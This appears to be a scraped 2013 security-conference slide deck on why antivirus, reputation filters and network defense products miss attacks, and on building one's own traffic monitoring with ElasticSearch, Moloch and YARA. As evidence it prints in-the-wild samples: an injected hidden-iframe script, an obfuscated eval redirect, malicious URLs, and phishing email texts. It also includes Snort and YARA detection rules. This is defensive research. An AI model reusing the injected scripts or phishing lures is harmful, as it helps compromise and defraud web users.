whats wrong with modern security tools and other blurps

Why there is no Silver Bullet
Whats Wrong with modern security tools:
Exploring (in)accuracy and (in)correctness of
modern network defense products

GroundZero 2013
V. Kropotov; F. Yarochkin; V. Chetvertakov

About speakers
●

●

●

Our interests are studying malicious behavior
on the network traffic
We get greater visibility of on-going activities
by monitoring network traffic in Russia and
Taiwan
We are very interested in expanding So if you
have pcaps to share, talk to us :-D
@fygrave @vbkropotov @sinitros89

Agenda (PT1)
●

Security Threats Landscape (intro)

●

AV Trolls

●

NetSec Trolls

●

Combo Trolls

●

What else could go wrong ;)

●

Conclusion

We work together as a research team
Today's two presentation topics are connected.
The second presentation will be a logical
continuation of the this talk

Traffic drives cybercrime economy
●

You can learn quite abit about primary victims
by simply reading thematic forums :)

Traff Pricing
Source:
A botnet load selling
portal

How to get traff
●

Web servers compromise (most common)

●

DNS servers or domain names hijacked
(add examples from afraid.org)

●

●

Banner campaign (adserver/openx
compromise. (swiss-cheese ;))
Other infrastructure compromised.
Example: memcache poisoning

Primary victims
●

About 40 000 000 Internet users in Russia
According our stats:

●

For every 10 000 hosts in Russia

●

500 hosts redirected to landing page every week

●

25-50 hosts with typical protection scheme (NAT,
proxy with antivirus, vendor supplied reputation
lists, etc.) are
COMPROMISED

News/Media outlets are very
popular this year
Domain

Resource type

Campaign dates

unique hosts per
day

News – official
gov publisher
news

Autumn 2013

~ 790 000

Winter 2013 – Autumn 2013

~ 590 000

gazeta.ru

news

Spring 2013 - Autumn 2013

~ 490 000

aif.ru

news


~ 330 000

mk.ru

news

Summer 2013

~ 315 000

vz.ru

news

Winter 2013 – Summer 2013

~ 170 000

lifenews.ru

news

Summer 2013

~ 170 000

topnews.ru

news

rg.ru
newsru.com


~ 140 000

Video, mail, regional gov – you
choose...!
Domain

Resource type

Youtube.com

When seen

unique hosts
per day

Summer 2013 - Autumn
2013 (malvertising?!)

Alexa N 3

mail.ru

Public email, search
engine

Winter 2013

Alexa N 33

Vesti.ru

TV news

Winter 2013

~ 1 050 000

tvrain.ru

TV

Autumn 2013

~ 250 000

mos.ru

Moscow gov portal

Winter 2013 – Spring 2013

~150 000

glavbukh.ru

Accountants


~65 000

tks.ru

Finance
(Import/Explort)

Summer 2013 - Autumn 2013

~38 000

Oops, a regional GOV resource,
July 2013

<script src="http://changeip.changeip.name/rsize.js">

So you have your exploit crawling
framework? - can it move the mouse
too... :)
<script src="http://changeip.changeip.name/rsize.js">
●

●

res='bhduqnd.selfip.org';var astatf = 0;

●

document.write("<head></head><b><div id='accountil'></div></b>");

●

document.onmousemove=jsstatic;

●

function jsstatic() { if (astatf == 0) { astatf++; text = "<iframe
src='http://"+res+"/bashimme/2' width='7' height='12' style='position:
absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe>";

●

document.getElementById("accountil").innerHTML = text }}

●

</script>

dns abuse of a legit domain
●

domain:

SCHOOLOPROS.RU

●

nserver:

ns1.afraid.org.

●

nserver:

ns2.afraid.org.

●

state:

REGISTERED, DELEGATED, VERIFIED

●

org:

LLC "GKShP"

●

registrar:

●

admin-contact: https://www.nic.ru/whois

●

created:

●

paid-till:

●

free-date:

RU-CENTER-REG-RIPN
2010.01.25
2014.01.25
2014.02.25I

How are you going to blacklist this?!
deaswqwehdskdqw.homelinux.com
→ 176.31.140.65
●

●

b3f21817812f11a62eb1b506.homelinux.com
→ 93.189.29.235
5f87b942cfa67def68889b81.homelinux.com
→ 93.189.29.235
lapachka.info → 93.189.29.235
Domain Name:LAPACHKA.INFO
Created On:05-Jun-2013 20:31:33 UTC
Last Updated On:20-Aug-2013 07:36:23 UTC
Expiration Date:05-Jun-2014 20:31:33 UTC
Sponsoring Registrar:DomainContext Inc. (R524-LRMS)

File extension based filters?!
http://hk.sz181.com/images/c4a.jpg

← Win32 Executable (payload)

Domain Name:sz181.com
Record last updated at 2013-03-11 09:27:18
Record created on 3/10/2005
Record expired on 03/10/2014
name:(ShenZhen Johns Property Accessory Supply Co.,LTD)
mail:(kf@johns168.com) +86.75526919616
+86.75526919856
ShenZhen Johns Property Accessory Supply Co.,LTD

<object width="640" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-4
src="http://www.35.com/upload/35WHOIS_FLASH__640_60.swf" width="640"
Billing Contactor:
ShenZhenShi ShenNanDaDao1021 Hao XiNianZhongXin 12A03
SHENZHEN
Guangdong,
18
CN
518040

So how fast are Security Vendors
with new signatures?!
●

AntiVirus Vendors – Hours..Days

●

Network Proxy Filtering - Days..Weeks

●

Other network security –
Days..Weeks..Months ..?

Updates are dangerous too. This kills
an executable from a legit
SAP installation

20

so.. the FUI (Fuck up indicators)
●

Antivirus == damn good Fuck Up indicator of your daily monitoring work. If
you see ex. CVE-2012-0158 the e-mail, received 1 year ago - you see
you fucked it up a year ago, but now must be able to react. :)
25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf
Undetermined clean error, deleted successfully
C:Documents and SettingsUser02Desktop2readModern energy in
China.msg68.OLE
25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf
Undetermined clean error, deleted successfully
C:Documents and SettingsUser02Desktop2readUS
energy.msg68.OLE
21

Email as attack vector.. are you a
target?
APT?
Non-targeted
●
●

●

Single exploit
Content of the mail is
accurate to context
Specific payload
behavior (stats)

●
●

Mass-mailed
Often no exploit used
(.exe in attach)

APT through email..

An RTF document
(CVE-2012-0158 - "MSCOMCTL.OCX RCE
Vulnerability." )
Payload writes a dll file
Recent build date (2013)
Autorun for persistence
Calls back to C2 server group
Suspicious user Agents:
Mozilla/4.0 (compatible; MSIE 6.0.1.3;
Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2)
Mozilla/4.0 (compatible)

Owning a network..
●

Vulnerabilities seen in use through this attack
vector:
MS Office
Adobe Acrobat
reader
CVE-2013-0640
CVE-2012-0775
Adobe flash
player
CVE-2012-1535

CVE-2012-0158
CVE-2011-1269
CVE-2010-3333
CVE-2009-3129
Java
CVE-2013-0422
CVE-2012-1723
CVE-2012-5076

But...
●

Human stupidity is exploited more than ever..

Email with a password protected
archive or a document
●

●

●

Password protected archives bypass AV checks,
firewall/WAF/.. detection
No exploit. Executable File is masked as
document (icon, extension)
Message contents motivates user to open the
attachment (social engineering)

Lets look at some examples
Добрый день,
По результатам проверки, у нашей фирмы обнаружился долг перед Вами
за январь на
сумму 9540 рубл. Наш главбух составила акт сверки и просит подписать
данный акт
и выслать его скан. А также спрашивает, что лучше написать при
переводе средств.
______________________________________________________________
_______________________
С уважением, комерческий директор ОАО "М-ТОРГ"
Маркина Ольга Алексеевна
ps. акт сверки в приложении к письму, пароль к архив 111

Examples (cont...)
Добрый день,
По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере
Вами за
декабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит
подписать
данный акт и выслать его скан. А также спрашивает, что лучше написать при
переводе
средств.
_______________________________________________________________________
________
С уважением, бухгалтер ЗАО "МСК"
Калинина Вера Владимировна
ps. акт сверки в приложении к письму, пароль к архиву 123
Good afternoon, According to the results of the audit, our firm will transfer
the debt to you for? December 2012. in the sum of 49540 rubles. Our chief
accountant make an act of reconciliation and asked to sign the act and send
it’s scan.
______________________________________________________________________________
Sincerely, Accountant of "MSK"? Vera V. Kalinina
P.s. statement attached to the letter, the password for the archive 123

.. and inside archive :)

Unpacked file

Another example
Subject: British Airways E-ticket receipts
e-ticket receipt
Booking reference: 05V9363845
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for
your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by
law, for the purposes of security and staff training and in order to prevent or detect unauthorised use
of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number:
89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex,
England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive
section that may help you if you have a question about your booking or travelling with British
Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the
addressee. If you are not the intended recipient please delete this email and inform the snder as soon
as possible. Please note that any copying, distribution or other action taken or omitted to be taken in
reliance upon it is prohibited and may be unlawful.

Another variation: email that
contains masked links to malicious
pages
•No attachment. The message text is
html/text points to the same resource
•All links are 'masked' to be pointing to
legit links
•The same attreactive text of the message

Encoded redirect..
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}
catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg)
{asd=0;try{}catch(q){asd=1;}if(!asd)
{w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new
Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,
39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,
44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,
115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,10
3,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];i
f(window.document)for(i=2-2;-i+104!=0;i+=1)
{j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>
</body>
</html>

Hot topic for big company, Cyprus
Crisis
Diana Ayala saw this story on the BBC News website and thought you should see it.
** Cyprus bailout: bank levy passed parliament already! **
Cyprus can amend terms to a bailout deal that has sparked huge public anger....
< http://www.bbc.com.us/go/em/news/world-cyprus-57502820>
** BBC Daily E-mail **
Choose the news and sport headlines you want - when you want them, all in one daily e-mail
< http://www.bbc.co.uk/email>
** Disclaimer **
The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not
necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of
the sender have been verified.
If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a
Friend service, please read our frequently asked questions by clicking here

This message is to notify you that your package has been processed and is on schedule for delivery
from ADP.
Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Tusesday, 5:00pm
Tracking Number (if one is available for this package): 1Z023R961390411904
Details: Click here to view and/or modify order
We will notify you via email if the status of your delivery changes.
-------------------------------------------------------------------------------Access these and other valuable tools at support.ADP.com:
o Payroll and Tax Calculators
o Order Payroll Supplies, Blank Checks, and more
o Submit requests online such as SUI Rate Changes, Schedule Changes, and more
o Download Product Documentation, Manuals, and Forms
o Download Software Patches and Updates
o Access Knowledge Solutions / Frequently Asked Questions
o Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP.com
-------------------------------------------------------------------------------This message and any attachments are intended only for the use of the addressee and
may contain information that is privileged and confidential. If the reader of the message
is not the intended recipient or an authorized representative of the intended recipient,
you are hereby notified that any dissemination of this communication is strictly
prohibited. If you have received this communication in error, notify the sender
immediately by return email and delete the message and any attachments from your
system.

AV logs – useful ;)
Antivirus find exploit in cache -> we was attacked -> antivirus
saves us! ;-)

The exploit can be in cache – AV finds it :)

s
AV actually removes a forensic
trace. PROFFIT :)

Incident entry point
●
●

Many vendors able to mine their clouds
But you need know a starting point for your
exploration ...

Death of AVs as we know them
●

Automatic malicious binaries builders
–

Unskilful attacker can produce unique binaries
with a single click

One sig per binary makes you transfer Tbs of data
to end-user machines :)
A simple solution – move sigs into cloud :-)

AV behaviour is not new
●

EmergingThreats rule, first added 2011-06-27 20:14:35 UTC
alert udp $HOME_NET any -> any 53 (msg:"ET
CURRENT_EVENTS Large DNS Query possible covert
channel"; content:"|01 00 00 01 00 00 00 00 00 00|";
fast_pattern; depth:10; offset:2; dsize:>300;
content:!"youtube|03|com|00|"; content:!"sophosxl|03|net|00|";
content:!"|0a|hashserver|02|cs|0a|trendmicro|03|com|00|";
content:!"spamhaus|03|org|00|"; classtype:bad-unknown;
sid:2013075; rev:7;)

AV trolls
●

Date/Time

2011-09-06 17:13:05 MSD

●

Tag Name

PDF_XFA_Script

●

Severity

Low

●

Target IP Address

●

Target Port 9090

●

Source IP Address

10.y.y.y

●

SourcePort Name

3201

●

arg

●

10.x.x.x

host=http://sonorophone.in&b=af7bb2f

VT says nothing?
payload in .jar feb 2013

46

AV is silent during attack, WHY?

Just because malware obfuscation
service is available
●

70$ per month, is it OK, *

* Max Goncharov Talk at PHDaysIII

So how do you know when to reencrypt?

Example, Aug 2013

<object height="0" align="left" width="0" type="text/html"
data="http://wrutr.VizVaz.com/viewforum.php?
b=cc119b1"></object>

August 2013

https://www.virustotal.com/en/file/70c21fb812665fc1d75b158b7a48f4e85cbaf5bcc37a2dfd0d0555a7f561f9a8/analysis/1376491063/
https://www.virustotal.com/en/file/deeee11c34a55901e368db3a715419ae886a33be3f504fd1203076b6eeb62502/analysis/1376490991/

Detection During the Time

October 2013

53

Side effects of heuristic detection
August 2013

October 2013

54

AV claims: VT is Not Fair??
23.01.13 19:56 Detected: Trojan-Spy.Win32.Zbot.aymr
C:/Documents and Settings/user1/Application Data/
Sun/Java/Deployment/cache/6.0/27/4169865b-641d53c9/UPX
23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.ck
C:/Documents and Settings/user1/Application Data/
Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/bpac/b.class
23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.cs
C:/Documents and Settings/user1/Application
Data/Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/ot/pizdi.class
23.01.13 19:58 Detected: HEUR:Exploit.Java.CVE-2013-0422.gen
C:/Documents and Settings/user1/Local Settings/
Temp/jar_cache3538799837370652468.tmp

56

Yes. You have been compromised
one week before...

1/14/2013
18:57

178.238.141.19 http://machete0-yhis.me/
pictures/demos/OAggq

application/x-javaarchive

1/14/2013
18:57

178.238.141.19 http://machete0yhis.me/pictures/demos/OAggq

application/x-javaarchive

1/14/2013
18:57

178.238.141.19 http://loretaa0application/octetshot.co/careers.php?
stream
cert=561&usage=392&watch=4
&proxy=49&ipod=171&shim=34
4&pets=433&icons=252&staff=6
21&refer=345

* reproduced on the stand, to estimate Vendor signatures updated time

57

Avs are still useful.. lets look at
some examples
●

Bootkits

●

Rootkits

●

Others

58

Appropriate AV use
30.10.2013 file infected. Undetermined clean
5:46 error, deleted successfully

Generic.dx!
4C9C664321AD

c:Total Commander 7.00
PP 0.50 .exeFITW.EXE


Generic.dx!
4C9C664321AD



Generic.dx!
4C9C664321AD



Generic.dx!
4C9C664321AD



Generic.dx!
4C9C664321AD



Generic.dx!
4C9C664321AD



Generic.dx!
4C9C664321AD



Generic.dx!
4C9C664321AD



Generic.dx!
4C9C664321AD


59

Appropriate AV use Cases,
Email under attack, exe usually not
targeted
Event
Generated
Time (UTC)

Threat Name

Event
Category

Threat
Type

Threat Target File
Path

10/23/13
12:03:54 AM

PWSZbot-FIU!
059FF890153F

Malware
detected

Trojan

KURUOGLU 5
Enquiry.zipKURUO
GLU 5 Enquiry..exe

10/25/13
4:55:37 AM

PWSZbot-FIU!
BC53FFF6285
D

Malware
detected

Trojan

Info_Invoice..no.16
6583.zipInfo_Invoic
e..no.166583.exe

60

Appropriate AV use Cases,
Office documents
●

●

●

Event Generated Time (UTC): 7/8/13 12:25:46 PM
Threat Source User Name: "Sports .ru"
<sport.info@bk.ru>
Threat Target File Прогнозы на Евро 2012 от
экстрасенсов и аналитиков.doc*

●

Event Category: Malware detected

●

Threat Name: Exploit-CVE2012-0158.b!rtf

●

Threat Type: Virus

●

Action Taken: Deleted
* Euro 2012 forecast from ... doc

61

Appropriate AV use Cases, The
same file was deleted, but many
times Threat Target File Path
Threat Name
Event Received
Action
Time (UTC)

Taken

RDN/Generic.dx!
cmr

10/27/13 9:56:54
PM

Deleted

C:Documents and SettingstestuserApplication
Datasvchost.exe

RDN/Generic.dx!
cmr

10/28/13 10:05:06
PM

Deleted

Datasvchost.exe

RDN/Generic.dx!
cmr

10/29/13 9:54:37
PM

Deleted

Datasvchost.exe

RDN/Generic.dx!
cmr

10/30/13 5:23:49
AM

Deleted

Datasvchost.exe

RDN/Generic.dx!
cmr

10/30/13 9:42:07
PM

Deleted

Datasvchost.exe

RDN/Generic.dx!
cmr

10/31/13 9:55:37
PM

Deleted

62

Network Security Tools
LoLs and Trolls :)

DNS Traffic Analysis..
What you can do with this event?

“REP.xlfkl”, is it dangerous?

Yep, vendor were able to detect APT

Appropriate Network tools use
●

Pray

●

Detect as you can

●

Check, maybe your vendor supplied tool
detected it somehow, and you can use this
information, but next time
Date/Time
2012-05-15 11:50:16
Tag Name
HTTP_Post
Severity
Low
Observance Type
Intrusion
Detection
Target IP Address
74.63.83.38
:server be4appy.com
:URL
/rep/cim.php
algorithm-id
3000003
Packet DestinationPort
80

71

Exploit Kits and TDS now personal?
●

hxxp://get.adnova.ru/?v2=1&ver=2&pad=2943&block=1362768946&url=http%3A%2F
%2Fratushnyak.org%2Fpage%2Fshark-cartilage.html&ref=http%3A%2F%2Fnova.rambler.ru%2Fsearch
%3Fquery%3D%25D0%25B0%25D0%25BA%25D1%2583%25D0%25BB
%25D0%25B8%25D0%25B9%2B%25D1%2585%25D1%2580%25D1%258F%25D1%2589%2B
%25D0%25BE%25D1%2582%25D0%25B7%25D1%258B
%25D0%25B2%25D1%258B&sw=1280&sh=1024&cw=1189&ch=879&fl=0&nc=0.2519320439819137 -->

●

gendarme795.kiltie146.dyndns-pics.com

54.217.234.176 80 GET

●

hxxp://gendarme795.kiltie146.dyndns-pics.com/?in=51118

●

Personal Network Storage, Internet Services

Wed, 23 Oct 2013 12:20:25 GMT

Exploit Kits and TDS now personal?
●

hxxp://nashaporno.ru/ -->
176.122.88.106

qzzj.dyndns.tv

●

GET

●

Tue, 08 Oct 2013 06:58:32 GMT

●

hxxp://qzzj.dyndns.tv/out.php?sid=1

Personal Network Storage, Internet
Services

May be forums?
●
●

37.9.52.134 80 GET
hxxp://bzsdrt.attraction-visitors.ru/
viewforum.php?b=ca3990d text/html

●

Tue, 15 Oct 2013 06:51:39 GMT

●

Forum/Bulletin Boards

Or Internet Services
●
●

37.9.52.103
hxxp://uistodr.is-an-accountant.com
/viewforum.php?b=75c3d28text/html

●

Wed, 16 Oct 2013 11:24:53 GMT

●

Internet Services

Oops, innovate search engine?
●

●

95.211.39.86 tanyauaa90.ru
http://tanyauaa90.ru/tuka4/?1&se_referer=http%3A%2F%2Fnova.rambler.ru
%2Fsearch%3Fquery%3D
%25D1%2586%25D0%25B5%25D1%2580%25D0%25BE
%25D0%25B1%25D1%2580%25D0%25B0%25D0%25B7%25D0%25B5%2
5D0%25BB%25D0%25B8%25D0%25BD%2B%25D0%25BF
%25D1%2580%25D0%25BE
%25D0%25B8%25D0%25B7%25D0%25B2%25D0%25BE
%25D0%25B4%25D0%25B8%25D1%2582%25D0%25B5%25D0%25BB
%25D1%258C&referer=http%3A%2F%2Fspireritmen1293.dlinkddns.com
%2Foe4500drajverad555%2Fcerobrazelin_instrukciya_po_primeneniyu_cen
a.html

●

Fri, 18 Oct 2013 08:39:17 GMT

●

Search Engines, Internet Services

domain:
registrar:
created:
●

●

TANYAUAA90.RU
REGRU-REG-RIPN
2013.10.17

Or Even Wiki page
●

benefaction.ru.heaven774.blogdns.com
54.217.234.176
http://benefaction.ru.heaven774.blogdns.com/
?in=55530

●

Tue, 08 Oct 2013 12:15:03 GMT

●

Blogs/Wiki

Reputation filters won't help here
●

On available Environments
less than 10% of malicious resources
categorized as malicious bu vendor supplied
reputation filters during October 2013

Reputation filters won't help here
URL on the same site: alldistributors.ru/image/
Site: alldistributors.ru

81

Some of them older than 10 years
●

●

Over 500
compromised
domains in 24 hours
Domain rotation once
per minute (3
minutes in the other
incident)

What do you know about more sophisticated
bots?

Proliferation of malware that uses
blogging/social networks as c2

Explore header anomaly
GET / ….
User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1)
Host:
Connection:
Cache-Control:
Pragma:

88

Elirks: v01


Reported by Dell/Secureworks as Elirks
http://www.secureworks.com/cyber-threatintelligence/threats/chasing_apt/

89

Elirks, v02
http://tw.myblog.yahoo.com/jw!
uzrxZwSGHxowPMGZAaj4I50http://blog.yam.com/minzhu0906/article/54726977
http://diary.blog.yam.com/bigtree20130514/article/101
73342
http://tw.myblog.yahoo.com/jw!
uzrxZwSGHxowPMGZAaj4I50http://blogs.yahoo.co.jp/sakasesi2013/31805794.html
http://www.plurk.com/mdbmdb

90

Campaigns can be linked by
the same IP sources to
access web

Managed by the same
IP addresses
(easy to cross-correlate)

Scalable Tools for Advanced Network
Monitoring
Discover malware operations with your bare
hands

V. Kropotov; F. Yarochkin

Gaand de Dhakkan
FOR YOUR NETWORK :)

Agenda
The battle field: network traff
0.5% of your traffic is what you really want.. now
what..?
Off-shelf tools and their problems
Automation of manual work. Alot of automation
Examples and Case studies
Conclusions

Disclaimer
We'll mainly talk about our experience with
scalable network monitoring.
Some of the tools we are about to mention, we
have developed ourselves.
Other tools are done by other great guys and we
are heavy users of those.

Monitoring VS Protection

●

Strange, but true
Efficiency(Monitoring)~O(1/ Efficiency(Protection))

Passive detection VS Active
protection
●

False positives for these methods

●

The cost of the time lag with passive detection

●

The cost of DoS from Active protection

Incident Mitigation VS Investigation

●

If your preparation is not enough
Efficiency(Mitigation)~
O(1/ Efficiency(Investigation))

●

If you prepared, almost all steps of Investigation
you can do asynchronously

Not typical approaches
●

●

●

Snapshotting
DNS Analysis and traffic Redirection (Internal
sinkholing)
Sandboxing

Systematic Defense

●

●

●

What to look at
How to look at your data

Rinse and repeat ;-)

How to prepare well for an
attack (you can't walk
into the same river twice,
so 'preserve' the flow)
100

Old skool network analysis :)
Snort is handy
●

Single node

●

Patterns specified in rule files

●

You get notified when alert occurs

●

You can specify some auto-reactive rules to
act real-time

What's missing
●

●

●

ability to capture from multiple nodes and
merge the results (me → snortnet, 1999 :p)
Your snort (or any other IDS) will miss stuff
that is not in signatures, now what ..
Running experimental analytics, FP analysis
on IDS results is very difficult because there is
no 'raw data'

Solution:

Store everything!? :-D

Just like ||SA! ;)

Now made possible..

We need a more than one node to store data
We need some sort of data management plan
And ..
A convenient way of finding things.. quick!

ElasticSearch
●

really awesome, all my data lives here ;)

ES
●

●

Multiple Indices, easy cross-correlation, data
HA, Lucene-based search capability
Design your data flow smartly (simple things:
indices are fast to remove, individual items –
are not, store metadata, keep raw data where
it was captured)

So what we store
●

Our feeds into ES:
–

Honeypot logs

–

Network monitoring with eyeipflow scriptlets

–

Network data from Moloch

–

DNS traff analysis

–

User-Agent/IP/time maps

What to look at....
●

●

Suspicious agents – works nicely (and easy to
implement with snort, surricata, etc)
Time-series traffic analysis

Emerging Threats has a large number of
APT related sigs. Take-and-modify :)

Not only payload used as transition
(covert channel in URL)
●

GET hxxp://lionsholders.biz/st.php?
os=windows
%207&browser=msie&browserver=8.0&
adobe%20reader=10.1&adobe
%20flash=11.7.700.169&windows%20media
%20player=12.0.7601.17514&java=0&silverli
ght=0

Honeypots
●

Service-simulation honeypots. Collect plenty
tracers on random network opportunists.
–

Ex: kippo (modified to keep trace-log in ES):

Nice collection of Romanian tools
over the years ;-)

eyeipflow
●

●
●

Libwireshark + python + yara. Capable of
processing pcap files that you collect elsewhere.
Libsniff-ng is good for high-volume traff
Store meta-data on various protocol
transactions: HTTP, SMTP, DNS ..

And then we discovered Moloch :)

Moloch
Uses libnids for packet reassembly
Multi-protocol
Supports yara
Actively developed
Supports plugin architecture
Custom taggers are extremely useful

Moloch with plugins (on DRUGS!)

Moloch is developed by a team at AOL and released open-source at
http://github.com/aol/moloch/

Introduction to writing...

moloch plugins

Introduction to writing moloch
plugins
●

moloch_plugin_init() {
moloch_plugin_register(“leet”,

FALSE);

/* register callbacks */
moloch_plugin_set_cb(“leet”, A, B, C, D, E, F,
H, I }
/* the rest of your init stuff */
}

Moloch plugins (pt 2)
●

Callbacks:
–

A) MolochPluginIpFunc

ipFunc,

–

B) MolochPluginUdpFunc

udpFunc,

–

C) MolochPluginTcpFunc

tcpFunc,

–

D) MolochPluginSaveFunc

preSaveFunc,

–

E) MolochPluginSaveFunc

saveFunc,

–

F) MolochPluginNewFunc

newFunc,

–

G) MolochPluginExitFunc

–

H) MolochPluginReloadFunc reloadFunc

exitFunc,

And even more
●

moloch_plugins_set_http_cb( …

Redundancy
Properties in
the malware
distribution and
postinfection
activities
campaigns

Passive DNS data is used to identify
DGA malware C2 servers

Passive HTTP monitoring
and anomaly detection

Wavelet-based analysis

Proxy logs at glance example

129

User-agent vulnerable clients
monitoring

130

User-agent request example, Why
legit Win8 is here?

131

Silent Debugging??
Host, OS, more than other 20 params..
●

Local host name HMS0277
X-Client/AppexWin8 X-Client-AppVersion/1.2.0.135
09.08.2013 8:13 131.253.40.10 80 GET

●

http://g.bing.net/8SE/201?
MI=FED21F3944A344D38E5C61C00AC78AC3&AP=3&LV=1.2
.0.135&OS=W8&TE=1&TV=ts20130613214629143%7Ctz240%7Ctmru-ru
%7Ctc1%7Cdr8%252C0%7Caa1058%252F1%252C0%252F0
%7CdaHMS0277%7CorRU
%7Cwa1%7Cde4%7Cad1%252C0%7Ccd9%252C0%7Cdd0%
7Ctp20130505%7Cccrow
%7Cdc1%7Cpd1%252C0%7Cto4%7Clc1%252C0%252C0%25
2C0%7Cdb1
132

User-agent anomaly monitoring

133

Proxy logs processing
The ideas
see the code example in
our git https://github.com/fygrave/ndf

1. Take predefined patterns for log fields
and calculate log line score. Depending on
score write down line into colored
(EB,B,W,EW,Gr) list for further investigation
(--list)
2. Find all lines with field matched specified
pattern – smth. like egrep+cutawk
(--match)
134

General course of work
(list search)

135

General course of work
(match search)

136

The scenario
1. --list ==> Scored rows with signatures ==>
Users in troubles
2. --match ==> Find all history about users in
troubles – before and after signature ==> Further
manual investigation
3. Update signatures if need to
137

Yara - based
Easy to integrate with your scripts
Integration with a proxy server is possible via
icap yara plugin:
https://github.com/fygrave/c_icap_yara (inline
analysis)
Raw network traffic monitoring project (and
http/DNS indexing):
https://github.com/fygrave/eyepkflow (passive
HTTP)

Detecting typical fields inside
payload
●

For example (YARA):
Rule SploitMatcher {
strings:
$match01 = "com.class'"
$match02 = "edu.class"
$match03 = "net.class"
$match04 = “security.class”
condition:
all of them
}

Problem: you can't deobfuscate javascript with Yara. But you can block the payload,
Which would be fetched by the javascript, thus break the exploitation chain.
139

Or you can roll your own..
personal crawler with yara
and jsonunpack :)
see the code example in
our git https://github.com/fygrave/ndf

140

Other cool YARA tools
Moloch https://github.com/aol/moloch
Yara mail https://
github.com/kevthehermit/yaraMail
Yara pcap https://
github.com/kevthehermit/YaraPcap

What we will see in 2014
●

●

●

●

●

Android based platforms would be one of the primary
targets
Vendor supplied reputation filters won't be so effective,
due the compromised legit domains pool size
Commercially oriented cyber criminals will use non
standard ports, abused hosting, DNS servers and short
time frames as now in Russia.
Cyber criminals will act outside the country of their
residence (it's better for Russia, but only for Russia...)
Defenders will use more and more own signatures,
rules, tools and pills to survive.

Forecast for 2014:
Roll your own..
To survive in this dangerous
environment.

143

Conclusion

We've seen interesting techniques
We've seen that the 'low-hanging fruit' is not so
low anymore :)

Now it is the time for questions
And throwing your shoes ;-)

Tools


Developed by our lab:
−
−

DNSLyzer http://gtihub.com/fygrave/dnslyzer

−


Eyepkflow http://github.com/fygrave/eyepkflow
HPFeeds Broker – no public release

3rd party tools we use:
−

Redis, ElasticSearch, Moloch, Hpfeeds library,
RabbitMQ, zmap

Data Acquisition options
- We have a software agent (unix(freeBSD, linux,
Solaris) platform compatible)
- We can process pcap files.
- We can deploy processing platform at your
facility (we need remote access)
- We have a collector device (1Gb network
interface)

whats wrong with modern security tools and other blurps

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (14)

Similaire à whats wrong with modern security tools and other blurps

Similaire à whats wrong with modern security tools and other blurps (20)

Plus de F _

Plus de F _ (12)

Dernier

Dernier (20)

whats wrong with modern security tools and other blurps

Notes de l'éditeur